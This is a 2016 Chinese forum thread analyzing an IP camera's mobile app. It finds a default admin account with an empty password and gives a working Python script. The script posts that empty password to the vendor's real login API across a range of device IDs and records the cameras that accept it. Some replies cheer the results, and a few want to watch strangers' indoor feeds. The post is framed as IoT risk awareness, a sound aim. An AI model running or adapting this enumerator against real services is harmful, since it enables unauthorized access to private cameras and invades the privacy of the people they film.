飘云阁(PYG官方论坛)

 找回密码
 加入论坛

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 12905|回复: 53

[IoT] 物联网时代-网络摄像头成安全隐患(易视云摄像头分析)

    [复制链接]
  • TA的每日心情
    开心
    2016-6-16 14:07
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2016-8-30 10:40:25 | 显示全部楼层 |阅读模式
    物联网时代-网络摄像头成安全隐患

          本文原创首发于飘云阁www.chinapyg.com转载请注明出处!谢谢!!

    作者:飘云&蓝枫  [飘云阁]

          互联网发展到了现今这个阶段,又发生了一种变化,那便是物联网了。说起物联网,您会想到什么?GPS、智能电表、车联网、网络监控?好吧,这都只是冰山一角。物联网,不管是广度还是深度,都已经超越了互联网。甚至,物联网虽然是以互联网为核心诞生,却在某些方面,远离了互联网。和很多物品一样,互联网也成了物联网的一个组成部分。但不管物联网还是互联网,用户的信息安全还是在首位的。

          但在面临为用户提供便利还是安全这道选择题时,厂商几乎无一例外地会选择便利。无论如何,不管一个设备可能有多安全,必定有其软肋。比如说,我们最近买了一台云监控摄像头。今天闲来无事,对这台物联网设备的手机软件进行了一番分析,发现一些安全隐患。


    App上连接机制是这样的:
    输入官方提供的云ID、用户名和密码



    默认用户名:admin 默认密码:空(漏洞开始!漏洞开始!漏洞开始! 重要事情说三遍)

    现在祭出抓包神器Charles,手机设置代理开始抓包!






    看关键字应该是一个API接口,这个我们目前不需要管。直接顺藤摸瓜找到主域,并输入ID、密码顺利登陆:


    这里虽然没有获取到设备信息,但是给了我们一种思路--现在只需要枚举到正确的设备ID就可能入侵到无密码的摄像头~

    顺便抓了一下登录成功的包:


    有了上面的思路,现在写一段Python脚本随便跑一个ID值范围

    [Python] 纯文本查看 复制代码
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Date    : 2016-08-24 16:36:17
    # @Author  : 飘云、蓝枫
    # @Link    : [url=https://www.chinapyg.com]https://www.chinapyg.com[/url]
    # @Comment : 易视云摄像头ID枚举
    
    import requests
    
    f = open('id.txt', 'a')
    
    def check(devid):
        payload = {'devid': devid, 'devname': 'admin',
                   'devpwd': '', 'action': 'LoginByEseeId'}
        r = requests.post("http://www.dvr163.com/ess/index.php", data=payload)
    
        ret = r.text
        if ret.find('1#') != -1:
            f.write(str(devid) + '\n')
    
    if __name__ == '__main__':
        for x in xrange(632610000, 632650000):
            print x
            check(x)
            
    f.close()
    


    随便跑了一会儿,得到不少有效ID


    抽取几个随便测试下:


    当然如果要得到更加详细的摄像头信息,可以深入分析一下他们的SDK,这里就不做详细研究了!!
    现在设想一下,不远的将来会有数以万亿个设备,这类情况到时会何等严峻。突然,我们目前缺乏安全和隐私与一旦物联网启动并运行起来,我们可能面临的严重势态相比似乎微不足道。


    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?加入论坛

    x

    评分

    参与人数 9威望 +36 飘云币 +12 收起 理由
    S6R2b + 4 PYG有你更精彩!
    392742060 + 4 PYG有你更精彩!
    butterapple + 4 赞一个!
    lcy925 + 4 + 4 PYG有你更精彩!
    a747969767 + 4 + 4 PYG有你更精彩!
    hotool + 4 PYG有你更精彩!
    序列号 + 4
    逍遥枷锁 + 4 + 4 赞一个!
    hyj7229 + 4 感谢发布原创作品!

    查看全部评分

    本帖被以下淘专辑推荐:

  • TA的每日心情
    无聊
    2017-11-5 12:00
  • 签到天数: 113 天

    [LV.6]常住居民II

    发表于 2016-8-30 10:45:57 | 显示全部楼层
    本帖最后由 0xcb 于 2016-8-30 10:52 编辑

    python好玩啊,跑的好快,一会儿就是一堆:D
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-8-30 10:47:15 | 显示全部楼层
    密码为空,摄像头官方威武霸气,为啥不加上不设密码无法使用 。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    4 天前
  • 签到天数: 422 天

    [LV.9]以坛为家II

    发表于 2016-8-30 10:48:03 | 显示全部楼层
    技术高深,我想看AV
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-2-27 15:18
  • 签到天数: 205 天

    [LV.7]常住居民III

    发表于 2016-8-30 10:51:06 | 显示全部楼层
    好赞。。深度好文。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-26 21:25
  • 签到天数: 21 天

    [LV.4]偶尔看看III

    发表于 2016-8-30 15:47:46 | 显示全部楼层
    好文,赞一个,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-26 21:25
  • 签到天数: 21 天

    [LV.4]偶尔看看III

    发表于 2016-8-30 16:04:20 | 显示全部楼层
    学习了,很好的文章
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-11-11 11:08
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2016-8-30 17:55:02 | 显示全部楼层
    学习了,值得收藏,谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    9 小时前
  • 签到天数: 1082 天

    [LV.10]以坛为家III

    发表于 2016-8-30 18:46:08 | 显示全部楼层
    我现在上班这个公司就做安防的,以前做一个云ID的,不知道大大们能不能破解呢哈哈
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    11 小时前
  • 签到天数: 908 天

    [LV.10]以坛为家III

    发表于 2016-8-30 18:49:49 | 显示全部楼层
    各种V.............我要看室内的V.............
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 加入论坛

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表